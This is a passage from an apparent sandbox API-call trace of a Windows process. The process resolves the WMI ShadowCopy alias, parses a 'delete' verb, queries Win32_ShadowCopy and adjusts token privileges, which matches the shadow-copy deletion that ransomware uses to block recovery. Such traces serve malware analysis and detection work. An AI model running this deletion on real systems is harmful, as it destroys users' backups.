wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0126.505] free (_Block=0x2fc910) [0126.505] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.506] malloc (_Size=0x3e) returned 0x2fca40 [0126.506] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.506] malloc (_Size=0x18) returned 0x2fc910 [0126.506] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="PWhere", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0xff42, wReserved2=0x0, wReserved3=0x0, varVal1=0x34e0e8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0x8, wReserved1=0xff42, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0126.506] free (_Block=0x2fc910) [0126.506] lstrlenW (lpString=" Where ID = '#'") returned 15 [0126.506] malloc (_Size=0x20) returned 0x2fca90 [0126.506] lstrlenW (lpString=" Where ID = '#'") returned 15 [0126.506] malloc (_Size=0x18) returned 0x2fc910 [0126.506] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="Connection", lFlags=0, pVal=0x16f760*(varType=0x0, wReserved1=0xff42, wReserved2=0x0, wReserved3=0x0, varVal1=0x39bc28, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f760*(varType=0xd, wReserved1=0xff42, wReserved2=0x0, wReserved3=0x0, varVal1=0x1bb09c0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0126.506] free (_Block=0x2fc910) [0126.506] IUnknown:QueryInterface (in: This=0x1bb09c0, riid=0xff3b7360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f750 | out: ppvObject=0x16f750*=0x1bb09c0) returned 0x0 [0126.507] GetCurrentThreadId () returned 0x6d8 [0126.507] ??0CHString@@QEAA@XZ () returned 0x16f678 [0126.507] malloc (_Size=0x18) returned 0x2fc910 [0126.507] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Namespace", lFlags=0, pVal=0x16f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff3c738f, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.507] free (_Block=0x2fc910) [0126.507] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0126.507] malloc (_Size=0x16) returned 0x2fc910 [0126.507] lstrlenW (lpString="ROOT\\CIMV2") returned 10 [0126.507] malloc (_Size=0x18) returned 0x2fc890 [0126.507] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Locale", lFlags=0, pVal=0x16f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.507] free (_Block=0x2fc890) [0126.507] lstrlenW (lpString="ms_409") returned 6 [0126.507] malloc (_Size=0xe) returned 0x2fc890 [0126.507] lstrlenW (lpString="ms_409") returned 6 [0126.507] malloc (_Size=0x18) returned 0x2fc8b0 [0126.507] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="User", lFlags=0, pVal=0x16f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.507] free (_Block=0x2fc8b0) [0126.508] malloc (_Size=0x18) returned 0x2fc8b0 [0126.508] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Password", lFlags=0, pVal=0x16f6a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.508] free (_Block=0x2fc8b0) [0126.508] malloc (_Size=0x18) returned 0x2fc8b0 [0126.508] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Server", lFlags=0, pVal=0x16f6a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.508] free (_Block=0x2fc8b0) [0126.508] lstrlenW (lpString=".") returned 1 [0126.508] malloc (_Size=0x4) returned 0x2f6e10 [0126.508] lstrlenW (lpString=".") returned 1 [0126.508] malloc (_Size=0x18) returned 0x2fc8b0 [0126.508] IWbemClassObject:Get (in: This=0x1bb09c0, wszName="Authority", lFlags=0, pVal=0x16f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0x2fc910), pType=0x0, plFlavor=0x0) returned 0x0 [0126.508] free (_Block=0x2fc8b0) [0126.508] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.508] IUnknown:Release (This=0x1bb09c0) returned 0x1 [0126.508] GetCurrentThreadId () returned 0x6d8 [0126.508] ??0CHString@@QEAA@XZ () returned 0x16f678 [0126.508] malloc (_Size=0x18) returned 0x2fc8b0 [0126.509] IWbemClassObject:Get (in: This=0x1bb04e0, wszName="__RELPATH", lFlags=0, pVal=0x16f6a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3cc318, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f6a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"ShadowCopy\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0 [0126.509] free (_Block=0x2fc8b0) [0126.509] malloc (_Size=0x18) returned 0x2fc8b0 [0126.509] GetCurrentThreadId () returned 0x6d8 [0126.509] ??0CHString@@QEAA@XZ () returned 0x16f4f8 [0126.509] ??0CHString@@QEAA@PEBG@Z () returned 0x16f510 [0126.509] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f4a0 [0126.509] ?Empty@CHString@@QEAAXXZ () returned 0x7fef927482c [0126.509] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2fcac0 [0126.510] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b [0126.510] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f460 [0126.511] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f4a8 [0126.511] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f510 [0126.511] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0126.511] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0126.511] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f468 [0126.511] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f4a0 [0126.511] ??1CHString@@QEAA@XZ () returned 0x1 [0126.511] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x2fcb30 [0126.511] ?Find@CHString@@QEBAHPEBG@Z () returned 0xa [0126.511] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f460 [0126.511] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f4a8 [0126.511] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f510 [0126.511] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0126.511] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0126.511] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f468 [0126.511] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f4a0 [0126.511] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.511] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef9274820 [0126.511] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.511] malloc (_Size=0x18) returned 0x2fc8d0 [0126.511] malloc (_Size=0x18) returned 0x2fc930 [0126.511] malloc (_Size=0x18) returned 0x2fc950 [0126.512] malloc (_Size=0x18) returned 0x2fc970 [0126.512] malloc (_Size=0x18) returned 0x2fc990 [0126.512] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0126.512] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0126.512] malloc (_Size=0x18) returned 0x2fc9b0 [0126.512] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0126.512] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0126.512] malloc (_Size=0x18) returned 0x2fc9d0 [0126.512] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0126.512] SysStringLen (param_1="\"") returned 0x1 [0126.512] free (_Block=0x2fc9b0) [0126.512] free (_Block=0x2fc990) [0126.512] free (_Block=0x2fc970) [0126.512] free (_Block=0x2fc950) [0126.513] free (_Block=0x2fc930) [0126.513] free (_Block=0x2fc8d0) [0126.513] IWbemServices:GetObject (in: This=0x1ba3b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f4e8*=0x0, ppCallResult=0x0 | out: ppObject=0x16f4e8*=0x1bb0a50, ppCallResult=0x0) returned 0x0 [0126.517] malloc (_Size=0x18) returned 0x2fc8d0 [0126.517] IWbemClassObject:Get (in: This=0x1bb0a50, wszName="Text", lFlags=0, pVal=0x16f520*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xff422ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f520*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3c6770*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x34de80, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0126.517] free (_Block=0x2fc8d0) [0126.517] SafeArrayGetLBound (in: psa=0x3c6770, nDim=0x1, plLbound=0x16f500 | out: plLbound=0x16f500) returned 0x0 [0126.517] SafeArrayGetUBound (in: psa=0x3c6770, nDim=0x1, plUbound=0x16f4f0 | out: plUbound=0x16f4f0) returned 0x0 [0126.517] SafeArrayGetElement (in: psa=0x3c6770, rgIndices=0x16f4e4, pv=0x16f538 | out: pv=0x16f538) returned 0x0 [0126.517] malloc (_Size=0x18) returned 0x2fc8d0 [0126.517] malloc (_Size=0x18) returned 0x2fc930 [0126.517] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0126.517] free (_Block=0x2fc8d0) [0126.517] IUnknown:Release (This=0x1bb0a50) returned 0x0 [0126.517] free (_Block=0x2fc9d0) [0126.518] ??1CHString@@QEAA@XZ () returned 0x3a186b01 [0126.518] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.518] free (_Block=0x2fc8b0) [0126.518] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.518] lstrlenW (lpString="Shadow copy management.") returned 23 [0126.518] malloc (_Size=0x30) returned 0x2f8600 [0126.518] lstrlenW (lpString="Shadow copy management.") returned 23 [0126.518] free (_Block=0x2fc930) [0126.518] IUnknown:Release (This=0x1bb04e0) returned 0x0 [0126.518] free (_Block=0x2fc8f0) [0126.518] ??1CHString@@QEAA@XZ () returned 0x7fef927482c [0126.518] lstrlenW (lpString="PATH") returned 4 [0126.518] lstrlenW (lpString="delete") returned 6 [0126.518] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="PATH", cchCount2=4) returned 1 [0126.518] lstrlenW (lpString="WHERE") returned 5 [0126.518] lstrlenW (lpString="delete") returned 6 [0126.518] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="WHERE", cchCount2=5) returned 1 [0126.518] lstrlenW (lpString="(") returned 1 [0126.518] lstrlenW (lpString="delete") returned 6 [0126.518] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="(", cchCount2=1) returned 3 [0126.518] lstrlenW (lpString="/") returned 1 [0126.518] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0126.519] lstrlenW (lpString="-") returned 1 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0126.519] malloc (_Size=0x18) returned 0x2fc8f0 [0126.519] lstrlenW (lpString="GET") returned 3 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0126.519] lstrlenW (lpString="LIST") returned 4 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0126.519] lstrlenW (lpString="SET") returned 3 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0126.519] lstrlenW (lpString="CREATE") returned 6 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0126.519] lstrlenW (lpString="CALL") returned 4 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0126.519] lstrlenW (lpString="ASSOC") returned 5 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0126.519] lstrlenW (lpString="DELETE") returned 6 [0126.519] lstrlenW (lpString="delete") returned 6 [0126.519] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0126.519] free (_Block=0x2fc8f0) [0126.520] lstrlenW (lpString="/") returned 1 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0126.520] lstrlenW (lpString="-") returned 1 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] malloc (_Size=0xe) returned 0x2fc8f0 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] lstrlenW (lpString="GET") returned 3 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0126.520] lstrlenW (lpString="LIST") returned 4 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0126.520] lstrlenW (lpString="SET") returned 3 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0126.520] lstrlenW (lpString="CREATE") returned 6 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0126.520] lstrlenW (lpString="CALL") returned 4 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0126.520] lstrlenW (lpString="ASSOC") returned 5 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0126.520] lstrlenW (lpString="DELETE") returned 6 [0126.520] lstrlenW (lpString="delete") returned 6 [0126.520] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0126.520] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.520] malloc (_Size=0x3e) returned 0x2fcac0 [0126.520] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.521] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff80 | out: _String="Select", _Context=0xffffffffffffff80) returned="Select" [0126.521] malloc (_Size=0x18) returned 0x2fc930 [0126.521] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0126.521] lstrlenW (lpString="FROM") returned 4 [0126.521] lstrlenW (lpString="*") returned 1 [0126.521] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0126.521] malloc (_Size=0x18) returned 0x2fc8b0 [0126.521] free (_Block=0x2fc930) [0126.521] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53007f00780008 | out: _String=0x0, _Context=0x53007f00780008) returned="from" [0126.521] lstrlenW (lpString="FROM") returned 4 [0126.521] lstrlenW (lpString="from") returned 4 [0126.521] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0126.521] malloc (_Size=0x18) returned 0x2fc930 [0126.521] free (_Block=0x2fc8b0) [0126.521] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008000780008 | out: _String=0x0, _Context=0x53008000780008) returned="Win32_ShadowCopy" [0126.521] malloc (_Size=0x18) returned 0x2fc8b0 [0126.521] free (_Block=0x2fc930) [0126.521] free (_Block=0x2fcac0) [0126.521] free (_Block=0x2fc8b0) [0126.521] lstrlenW (lpString="SET") returned 3 [0126.521] lstrlenW (lpString="delete") returned 6 [0126.521] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0126.521] lstrlenW (lpString="CREATE") returned 6 [0126.521] lstrlenW (lpString="delete") returned 6 [0126.521] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0126.521] free (_Block=0x2fc7f0) [0126.521] malloc (_Size=0x8) returned 0x2fcac0 [0126.521] lstrlenW (lpString="GET") returned 3 [0126.522] lstrlenW (lpString="delete") returned 6 [0126.522] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0126.522] lstrlenW (lpString="LIST") returned 4 [0126.522] lstrlenW (lpString="delete") returned 6 [0126.522] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0126.522] lstrlenW (lpString="ASSOC") returned 5 [0126.522] lstrlenW (lpString="delete") returned 6 [0126.522] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0126.522] WbemLocator:IUnknown:AddRef (This=0x1b91390) returned 0x3 [0126.522] free (_Block=0x17dfb0) [0126.522] lstrlenW (lpString="") returned 0 [0126.522] lstrlenW (lpString="XDUWTFONO") returned 9 [0126.522] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0126.522] lstrlenW (lpString="XDUWTFONO") returned 9 [0126.522] malloc (_Size=0x14) returned 0x2fc7f0 [0126.522] lstrlenW (lpString="XDUWTFONO") returned 9 [0126.522] GetCurrentThreadId () returned 0x6d8 [0126.522] GetCurrentProcess () returned 0xffffffffffffffff [0126.522] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f8c0 | out: TokenHandle=0x16f8c0*=0x28c) returned 1 [0126.522] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f8b8 | out: TokenInformation=0x0, ReturnLength=0x16f8b8) returned 0 [0126.522] malloc (_Size=0x118) returned 0x2fcae0 [0126.522] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x3, TokenInformation=0x2fcae0, TokenInformationLength=0x118, ReturnLength=0x16f8b8 | out: TokenInformation=0x2fcae0, ReturnLength=0x16f8b8) returned 1 [0126.522] AdjustTokenPrivileges (in: TokenHandle=0x28c, DisableAllPrivileges=0, NewState=0x2fcae0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=68708525, Attributes=0xde82), (Luid.LowPart=0x0, Luid.HighPart=1564592, Attributes=0x0), (Luid.LowPart=0x22, Luid.HighPart=939524923, Attributes=0xde95), (Luid.LowPart=0x0, Luid.HighPart=3080536, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0126.522] free (_Block=0x2fcae0) [0126.522] CloseHandle (hObject=0x28c) returned 1 [0126.522] lstrlenW (lpString="GET") returned 3 [0126.522] lstrlenW (lpString="delete") returned 6 [0126.522] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0126.522] lstrlenW (lpString="LIST") returned 4 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0126.523] lstrlenW (lpString="SET") returned 3 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0126.523] lstrlenW (lpString="CALL") returned 4 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0126.523] lstrlenW (lpString="ASSOC") returned 5 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0126.523] lstrlenW (lpString="CREATE") returned 6 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0126.523] lstrlenW (lpString="DELETE") returned 6 [0126.523] lstrlenW (lpString="delete") returned 6 [0126.523] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0126.524] malloc (_Size=0x18) returned 0x2fc8b0 [0126.524] lstrlenA (lpString="") returned 0 [0126.524] malloc (_Size=0x2) returned 0x17dfb0 [0126.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3b314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0126.524] free (_Block=0x17dfb0) [0126.524] malloc (_Size=0x18) returned 0x2fc930 [0126.524] lstrlenA (lpString="") returned 0 [0126.524] malloc (_Size=0x2) returned 0x17dfb0 [0126.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xff3b314c, cbMultiByte=-1, lpWideCharStr=0x17dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0126.524] free (_Block=0x17dfb0) [0126.524] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.524] malloc (_Size=0x3e) returned 0x2fcae0 [0126.524] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0126.524] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff60 | out: _String="Select", _Context=0xffffffffffffff60) returned="Select" [0126.524] malloc (_Size=0x18) returned 0x2fc9d0 [0126.524] free (_Block=0x2fc930) [0126.525] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008400680007 | out: _String=0x0, _Context=0x53008400680007) returned="*" [0126.525] lstrlenW (lpString="FROM") returned 4 [0126.525] lstrlenW (lpString="*") returned 1 [0126.525] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0126.525] malloc (_Size=0x18) returned 0x2fc930 [0126.525] free (_Block=0x2fc9d0) [0126.525] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008500680007 | out: _String=0x0, _Context=0x53008500680007) returned="from" [0126.525] lstrlenW (lpString="FROM") returned 4 [0126.525] lstrlenW (lpString="from") returned 4 [0126.525] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0126.525] malloc (_Size=0x18) returned 0x2fc9d0 [0126.525] free (_Block=0x2fc930) [0126.525] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x53008600680007 | out: _String=0x0, _Context=0x53008600680007) returned="Win32_ShadowCopy" [0126.525] malloc (_Size=0x18) returned 0x2fc930 [0126.525] free (_Block=0x2fc9d0) [0126.525] free (_Block=0x2fcae0) [0126.525] malloc (_Size=0x18) returned 0x2fc9d0 [0126.525] malloc (_Size=0x18) returned 0x2fc8d0 [0126.525] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0126.525] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0126.525] free (_Block=0x2fc8b0) [0126.525] free (_Block=0x2fc9d0) [0126.525] ??0CHString@@QEAA@XZ () returned 0x16f830 [0126.525] GetCurrentThreadId () returned 0x6d8 [0126.526] malloc (_Size=0x18) returned 0x2fc9d0 [0126.526] malloc (_Size=0x18) returned 0x2fc8b0 [0126.526] malloc (_Size=0x18) returned 0x2fc950 [0126.526] malloc (_Size=0x18) returned 0x2fc970 [0126.526] malloc (_Size=0x18) returned 